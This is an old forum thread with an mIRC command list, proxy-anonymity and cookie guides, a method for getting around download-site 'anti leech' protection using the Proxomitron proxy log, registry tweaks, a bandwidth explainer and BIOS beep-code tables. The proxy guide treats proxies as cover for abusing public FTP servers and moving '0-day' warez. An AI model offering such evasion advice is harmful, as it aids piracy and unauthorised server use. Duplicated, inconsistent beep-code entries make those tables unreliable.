/clear Clears the entire scrollback buffer of the current window.
/ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} Does the given ctcp request on
nickname.
/closemsg {nickname} Closes the query window you have open to the specified nick.
/creq [ask | auto | ignore] Sets your DCC 'On Chat request' settings in DCC/Options.
/dcc send {nickname} {file1} {file2} {file3} ... {fileN} Sends the specified files to nick.
/dcc chat {nickname} Opens a dcc window and sends a dcc chat request to nickname.
/describe {#channel} {action text} Sends the specifed action to the specified channel window.
/dde [-r] {service} {topic} {item} [data] Allows DDE control between mIRC and other
applications.
/ddeserver [on [service name] | off] To turn on the DDE server mode, eventually with a given
service name.
/disable {#groupname} De-activates a group of commands or events.
/disconnect Forces a hard and immediate disconnect from your IRC server. Use it with care.
/dlevel {level} Changes the default user level in the remote section.
/dns {nickname | IP address | IP name} Uses your providers DNS to resolve an IP address.
/echo [nickname|#channel|status] {text} Displays the given text only to YOU on the given place
in color N.
/enable {#groupname} Activates a group of commands or events.
/events [on|off] Shows the remote events status or sets it to listening or not.
/exit Forces mIRC to closedown and exit.
/finger Does a finger on a users address.
/flood [{numberoflines} {seconds} {pausetime}] Sets a crude flood control method.
/fsend [on|off] Shows fsends status and allows you to turn dcc fast send on or off.
/fserve {nickname} {maxgets} {homedirectory} [welcome text file] Opens a fileserver.
/guser {level} {nick} [type] Adds the user to the user list with the specified level and
address type.
/help {keyword} Brings up the Basic IRC Commands section in the mIRC help file.
/ignore [on|off|nickname|address] Toggles ignoring of a nick or address or sets it on or off
totally.
/invite {nickname} {#channel} Invites another user to a channel.
/join {#channel} Makes you join the specified channel.
/kick {#channel} {nickname} Kicks nickname off a given channel.
/list [#string] [-min #] [-max #] Lists all currently available channels, evt. filtering for
parameters.
/log [on|off] Shows the logging status or sets it on or off for the current window.
/me {action text} Sends the specifed action to the active channel or query window.
/mode {#channel|nickname} [[+|-]modechars [parameters]] Sets channel or user modes.
/msg {nickname} {message} Send a private message to this user without opening a query window.
/names {#channel} Shows the nicks of all people on the given channel.
/nick {new nickname} Changes your nickname to whatever you like.
/notice {nick} {message} Send the specified notice message to the nick.
/notify [on|off|nickname] Toggles notifying you of a nick on IRC or sets it on or off totally.
/onotice [#channel] {message} Send the specified notice message to all channel ops.
/omsg [#channel] {message} Send the specified message to all ops on a channel.
/part {#channel} Makes you leave the specified channel.
/partall Makes you leave all channels you are on.
/ping {server address} Pings the given server. NOT a nickname.
/play [-c] {filename} [delay] Allows you to send text files to a window.
/pop {delay} [#channel] {nickname} Performs a randomly delayed +o on a not already opped nick.
/protect [on|off|nickname|address] Toggles protection of a nick or address or sets it on or off
totally.
/query {nickname} {message} Open a query window to this user and send them the private message.
/quit [reason] Disconnect you from IRC with the optional byebye message.
/raw {raw command} Sends any raw command you supply directly to the server. Use it with care!!
/remote [on|off] Shows the remote commands status or sets it to listening or not.
/rlevel {access level} Removes all users from the remote users list with the specified access
level.
/run {c:\path\program.exe} [parameters] Runs the specified program, evt. with parameters.
/ruser {nick[!]|address} [type] Removes the user from the remote users list.
/save {filename.ini} Saves remote sections into a specified INI file.
/say {text} Says whatever you want to the active window.
/server [server address [port] [password]] Reconnects to the previous server or a newly
specified one.
/sound [nickname|#channel] {filename.wav} {action text} Sends an action and a fitting sound.
/speak {text} Uses the external text to speech program Monologue to speak up the text.
/sreq [ask | auto | ignore] Sets your DCC 'On Send request' settings in DCC/Options.
/time Tells you the time on the server you use.
/timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] Activates a timer.
/topic {#channel} {newtopic} Changes the topic for the specified channel.
/ulist [{|}]{level} Lists all users in the remote list with the specified access levels.
/url [-d] Opens the URL windows that allows you to surf the www parallel to IRC.
/uwho [nick] Pops up the user central with information about the specified user.
/who {#channel} Shows the nicks of all people on the given channel.
/who {*address.string*} Shows all people on IRC with a matching address.
/whois {nickname} Shows information about someone in the status window.
/whowas {nickname} Shows information about someone who -just- left IRC.
/wavplay {c:\path\sound.wav} Locally plays the specified wave file.
/write [-cidl] {filename} [text] To write the specified text to a .txt file.

MoViEBoT #xdcc-help /server irc.atomic-irc.net

We strive to make IRC easier for you!

Master
28-04-07, 23:56
Anonymity of Proxy

The exchange of information in Internet is made by the "client - server" model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, ...)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider?s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

Only the registered members can see the link ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

Only the registered members can see the link ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

Only the registered members can see the link ? what language is used in browser (what language a page should be displayed in)

Only the registered members can see the link ? so called "a user?s agent". For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

Only the registered members can see the link ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, Only the registered members can see the link Only the registered members can see the link Only the registered members can see the link SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
Only the registered members can see the link = ru
Only the registered members can see the link = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Only the registered members can see the link = Only the registered members can see the link
Only the registered members can see the link = 194.85.1.1 (Squid/2.4.STABLE7)
Only the registered members can see the link = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables "hide" from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
Only the registered members can see the link = not determined
Only the registered members can see the link = not determined

According to how environment variables "hided" by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
Only the registered members can see the link = proxy IP
Only the registered members can see the link = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
Only the registered members can see the link = proxy IP
Only the registered members can see the link = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
Only the registered members can see the link = proxy IP
Only the registered members can see the link = random IP address
High Anonymity Proxies

These proxy servers are also called "high anonymity proxy". In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
Only the registered members can see the link = not determined
Only the registered members can see the link = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

Master
29-04-07, 00:01
Anonymity

I can see you hiding in the shadows over there and so can the logs of all the web sites, FTP servers and other nooks and crannies you visit on the web. The sort of information gathered by these logs and which is available to the webmasters of the sites you visit include the address of the previous site you visited, your IP address, your computer's ID name, your physical location and the name of your ISP along with less personal details such as the operating system you're using and your screen resolution. If someone was snooping through your dustbin to gather information on consumer trends or tracking your every move to see where it is you go everyday you wouldn't be too chuffed would you. Well the web is no different, it's still an invasion of privacy and a threat to security and you don't have to put up with it.

Proxy servers:
Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defence against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.

There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity. Two of the best examples of this type of web based proxy service are Code:
hxxp://Only the registered members can see the link
and hxxp://Only the registered members can see the link

Obviously one disadvantage of using a web based service like Rewebber or Anonymizer, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.

The second method you can use to protect your privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses. This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box and go forth and surf anonymously.

Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually. To locate such a list you can investigate sites such as Code:
hxxp://Only the registered members can see the link

however, this method isn't problem free either, so before you get too carried away and go jumping on the anonymity bandwagon there are a few things you should be aware of. It's very easy to use proxies to protect your privacy, but often the disadvantages of using them far out weigh the benefits. You see, the problem is that, like the proxy servers provided Rewebber et al, free, public proxies are nearly all over subscribed and so they can slow down web browsing considerably. Digging out fast reliable proxy servers is an art form in itself and is a skill which takes considerable practice. You could find a list of public proxy servers and then experiment with each one until you find one that runs at a reasonable speed, but this can be very time consuming and frustrating. Instead, your search would be much more efficient if you got a dedicated program to carry out this task for you. There are literally dozens of proxy seeking programs around which can do just that, and many of them are available as freeware. What these do is scan the internet for public proxy servers. These servers are then tested for speed and anonymity (not all of them are truly anonymous, even if they claim to be!) and once you find one which suits your requirements you can select it as your default proxy with the click of a button.

One of the most significant advantages of using an automated tool to locate proxy servers is that you do not have to keep editing your proxy settings manually each time you wish to try out a new one. Instead, what you do is enter 'localhost' or '127.0.0.1' into the 'address' box and '8088' into the 'port' box of your browser's proxy settings menu and then forget about it. All future proxy switching is then orchestrated from within your proxy seeking software, which subsequently relays the information to your browser or whatever type of application you are attempting to make anonymous. For those of you who are curious 'localhost' and the IP address '127.0.0.1' are the names by which every computer on the internet refers to itself.
Here's a good selection of links, which should help you to get started - Code:
hxxp://Only the registered members can see the link Anonymity 4 Proxy
hxxp://Only the registered members can see the link Hi Proxy
hxxp://Only the registered members can see the link Proxy Verifier
hxxp://Only the registered members can see the link Stealther.

You may find that even when using these programs you have difficulty finding good proxy servers. It is for this reason that many people choose only to use proxy servers temporarily whilst doing something which may land them in trouble with their ISP, or in a worst case scenario with the law. The most obvious example of a situation in which you would want to cover your tracks is when scanning for public FTP servers and subsequently uploading to them. Most other net activities are unlikely to incur serious consequences so under these circumstances you can safely surf the web without a proxy. If you're really serious about protecting your privacy, however, your best bet is probably to invest in a dedicated, stable proxy such as the ones offered by Code:
hxxp://Only the registered members can see the link Ultimate Anonymity


These aren't free, but may be worth the expense if you aren't keen on continuously switching proxy servers.

Before splashing out though it may be worth checking if your current ISP has a proxy server of its own which you can use. These aren't there to help you to commit cyber crimes and get away with it, they actually have a legitimate purpose as well - otherwise they wouldn't exist. You see, proxy servers were originally designed to help speed up web page loading times. Proxy servers contain a cache of all the web pages which have been requested via the browsers of the people using the proxy. When someone surfs the web using a proxy, the proxy first checks to see if it already has a copy of the web page stored in its cache. If this version of the page is bang up to date, it is sent to your computer and appears in your browser. If the page found in the cache of the proxy server is older than the one stored on the server hosting the page, a new request to the web server is made and the page is updated in the cache of the proxy before being sent to you. Because these servers use very fast internet connections they can retrieve web pages at much greater speeds than you can via your modest home setup. If these servers are located physically nearer to your home than the web host servers you wish to retrieve web pages from, the speed at which you browse the web will be accelerated.


Anonymity - Cookies
One last important point you need to be aware of before jumping in with both feet is that different programs have to be setup in different ways before being able to make external connections via a proxy server. For example, you can surf the web anonymously by modifying the settings in Internet Explorer or Netscape Navigator as explained earlier in this tutorial, but this will only affect your browser. If you then used Flash FXP to copy a batch of 0-day releases from one FTP server to another, this isn't going to protect you in the slightest. What you have to do is enter the name of the proxy server into each application you wish to make anonymous before making any external connections. This can usually be done by browsing through the preferences of your program to see if there is a 'use proxy server' option available. If there is, make sure you use it!


Cookies:
You have little to fear from the edible variety, but the digital ones can be a major threat to your security and privacy. A cookie is a tiny text file (usually less than 1kb in size), which is created and stored on your hard drive whenever you visit a dynamic (or an interactive if you like) web site. These are used to log your personal details so that you can access members only areas of web sites without having to type in a password every time, or to retain your customised settings so that they are available the next time you visit. If you're using a shared computer, anyone who visits the same site that you have previously logged in to can access your accounts. This is particularly worrying if you have entered your credit card details into a form on an e-commerce site. If your browser is set to automatically fill in these details whenever you
return to a previously visited site, this information could be clearly visible - you don't need me to explain the problems this could entail.

The solution to this problem is to delete any cookies which contain sensitive data once you have completed your transactions. Your cookies will be stored in a different place depending on which operating system you are using so you will have to use your detective skills to find them. As an example, in Windows XP they are located in your 'c:\Documents and Settings\Kylie Minogue\Cookies' directory (that is if your name is Kylie Minogue. Mine isn't in case you're wondering!). If you look in this directory, in some cases it is easy to identify which cookie is associated with which web site, but in other cases it's not so obvious. The cookie which was created when you visited Yahoo.com to check your email may be called kylie minogue@yahoo.txt for example. Unfortunately some cookies refer to the IP address of the site you visited and so look more like kylie minogue@145.147.25.21. These cookies can be selectively deleted one at a time if it's obvious which ones are causing a threat to your security, or you can just wipe out the whole lot in one fell swoop and have them recreated as and when they are required. However, if
you're really struggling to find your cookie jar, you could delete your cookies via your browser's tool bar instead. In Internet Explorer this can be done through the 'Tools' &gt; 'Internet Options' menu items.

If all this sounds like too much hassle, you can always find a labour saving program which will be happy to take the job off your hands. These 'cookie crunching' programs allow you to be more selective when editing, viewing and deleting cookies from your system, and some of them will even prevent cookies from being created in the first place. Yes, I know you're hungry for links so I won't deprive you. Have a look here - Code:
hxxp://Only the registered members can see the link Cookie
Cruncher
hxxp://Only the registered members can see the link Cookie Crusher
hxxp://Only the registered members can see the link Cookie Killer
hxxp://Only the registered members can see the link Cookie Pal
and
hxxp://Only the registered members can see the link Cookie Web Kit.

Master
29-04-07, 00:02
I was just asking to know if there is some audiance before
here is my methode
for hacking anti leech
we gona use a soft calde proxo mitron
proxomitron is an anti bull script web proxy it' works buy applying some rules to elliuminte pop up and many other thing but for our cas we need to desactive all this filtring first goto
w-w.proxomitron.info
download a copy of the soft
then you need to unselect all the option of the soft
and clik on log window
no go to a anti leech web site
use the plug in and not netpumper
in the plugin
add a proxy
you must put this proxy adress
127.0.0.1 8080 for http
the same for ftp
now select the file to download a click download
watch in proximitron log winodws you will see many internal forwarding
if the file are located in a ftp server
proximitron dont handel them
and you will find an error
in a ftp adress
if it's a http adress
you will find some thing like
get /blablalma/bla/file
site tr.com
and you have foudn the adress
it' tr.com/blabla/file

Master
29-04-07, 00:03
Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.


QUOTE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l]
"WaitToKillServiceTimeout"="1000"


2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

Master
29-04-07, 00:03
An unattended Windows XP/2003 install can install all your software and settings along with Windows, and without you having to click a button or press a key,completely automated. Learn how over here:

CODE

Only the registered members can see the link


Make your unattended setup now!

Master
29-04-07, 00:06
ok m8s,
any of you that do websites and like to open .html and similar files in notepad to edit scrpits, this is THE coolest windows registry edit ever
you can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually
CODE
Only the registered members can see the link


Manually: regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
add the key "notepad"
it's default value should be "Open with Notepad"
now, under "notepad", add the key "Command"
it's default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"

ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad

HOW BADASS IS THAT?!?!?!?
I FOUND THIS ONE ON MY OWN!!!!!!

i know this one works on XP and 2000, you can PROBABLY enter it manually on windows 9x, but i have not tested that


okay okay, i know maybe not everyone cares...but this was fun for me because i love tweaking my computer AND it makes some web design stuff eaiser for me :D

Master
29-04-07, 00:06
This is well written explanation about bandwidth, very useful info.



BandWidth Explained

Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.


Network Connectivity

The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.

If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).


Traffic

A very simple analogy to use to understand bandwidth and traffic is to think of highways and cars. Bandwidth is the number of lanes on the highway and traffic is the number of cars on the highway. If you are the only car on a highway, you can travel very quickly. If you are stuck in the middle of rush hour, you may travel very slowly since all of the lanes are being used up.

Traffic is simply the number of bits that are transferred on network connections. It is easiest to understand traffic using examples. One Gigabyte is 2 to the 30th power (1,073,741,824) bytes. One gigabyte is equal to 1,024 megabytes. To put this in perspective, it takes one byte to store one character. Imagine 100 file cabinets in a building, each of these cabinets holds 1000 folders. Each folder has 100 papers. Each paper contains 100 characters - A GB is all the characters in the building. An MP3 song is about 4MB, the same song in wav format is about 40MB, a full length movie can be 800MB to 1000MB (1000MB = 1GB).

If you were to transfer this MP3 song from a web site to your computer, you would create 4MB of traffic between the web site you are downloading from and your computer. Depending upon the network connection between the web site and the internet, the transfer may occur very quickly, or it could take time if other people are also downloading files at the same time. If, for example, the web site you download from has a 10MB connection to the internet, and you are the only person accessing that web site to download your MP3, your 4MB file will be the only traffic on that web site. However, if three people are all downloading that same MP at the same time, 12MB (3 x 4MB) of traffic has been created. Because in this example, the host only has 10MB of bandwidth, someone will have to wait. The network equipment at the hosting company will cycle through each person downloading the file and transfer a small portion at a time so each person's file transfer can take place, but the transfer for everyone downloading the file will be slower. If 100 people all came to the site and downloaded the MP3 at the same time, the transfers would be extremely slow. If the host wanted to decrease the time it took to download files simultaneously, it could increase the bandwidth of their internet connection (at a cost due to upgrading equipment).


Hosting Bandwidth

In the example above, we discussed traffic in terms of downloading an MP3 file. However, each time you visit a web site, you are creating traffic, because in order to view that web page on your computer, the web page is first downloaded to your computer (between the web site and you) which is then displayed using your browser software (Internet Explorer, Netscape, etc.) . The page itself is simply a file that creates traffic just like the MP3 file in the example above (however, a web page is usually much smaller than a music file).

A web page may be very small or large depending upon the amount of text and the number and quality of images integrated within the web page. For example, the home page for CNN.com is about 200KB (200 Kilobytes = 200,000 bytes = 1,600,000 bits). This is typically large for a web page. In comparison, Yahoo's home page is about 70KB.


How Much Bandwidth Is Enough?

It depends (don't you hate that answer). But in truth, it does. Since bandwidth is a significant determinant of hosting plan prices, you should take time to determine just how much is right for you. Almost all hosting plans have bandwidth requirements measured in months, so you need to estimate the amount of bandwidth that will be required by your site on a monthly basis

If you do not intend to provide file download capability from your site, the formula for calculating bandwidth is fairly straightforward:

Average Daily Visitors x Average Page Views x Average Page Size x 31 x Fudge Factor

If you intend to allow people to download files from your site, your bandwidth calculation should be:

[(Average Daily Visitors x Average Page Views x Average Page Size) +
(Average Daily File Downloads x Average File Size)] x 31 x Fudge Factor

Let us examine each item in the formula:

Average Daily Visitors - The number of people you expect to visit your site, on average, each day. Depending upon how you market your site, this number could be from 1 to 1,000,000.

Average Page Views - On average, the number of web pages you expect a person to view. If you have 50 web pages in your web site, an average person may only view 5 of those pages each time they visit.

Average Page Size - The average size of your web pages, in Kilobytes (KB). If you have already designed your site, you can calculate this directly.

Average Daily File Downloads - The number of downloads you expect to occur on your site. This is a function of the numbers of visitors and how many times a visitor downloads a file, on average, each day.

Average File Size - Average file size of files that are downloadable from your site. Similar to your web pages, if you already know which files can be downloaded, you can calculate this directly.

Fudge Factor - A number greater than 1. Using 1.5 would be safe, which assumes that your estimate is off by 50%. However, if you were very unsure, you could use 2 or 3 to ensure that your bandwidth requirements are more than met.

Usually, hosting plans offer bandwidth in terms of Gigabytes (GB) per month. This is why our formula takes daily averages and multiplies them by 31.


Summary

Most personal or small business sites will not need more than 1GB of bandwidth per month. If you have a web site that is composed of static web pages and you expect little traffic to your site on a daily basis, go with a low bandwidth plan. If you go over the amount of bandwidth allocated in your plan, your hosting company could charge you over usage fees, so if you think the traffic to your site will be significant, you may want to go through the calculations above to estimate the amount of bandwidth required in a hosting plan.

Master
29-04-07, 00:08
Beep Code Manual, Better Than Gold Techies, American Megatrends Int. & Phoenix

(I'm IT, I use these codes to trouble shoot hardware issues at my job. Enjoy) cold.gif

BIOS Beep Codes

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS.

The two most-used brands are AMI (American Megatrends International) and Phoenix.

Below are listed the beep codes for AMI systems, and here are the beep codes for Phoenix systems.


AMI Beep Codes

Beep Code Meaning
1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps Memory parity error. The parity circuit is not working properly.
3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps Processor failure. The system CPU has failed.
6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps Virtual mode exception error.
8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short Failure in the video system.
1 long beep, 3 short A failure has been detected in memory above 64K.
1 long beep, 8 short Display test failure.
Continuous beeping A problem with the memory or video.
BIOS Beep Codes


Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure.
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor.

Master
29-04-07, 00:09
After repeated requests for beep codes i have decided to post them here maybe they could be pinned

Standard Original IBM POST Error Codes
Code Description

1 short beep System is OK
2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card
IBM POST Diagnostic Code Descriptions
Code Description
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
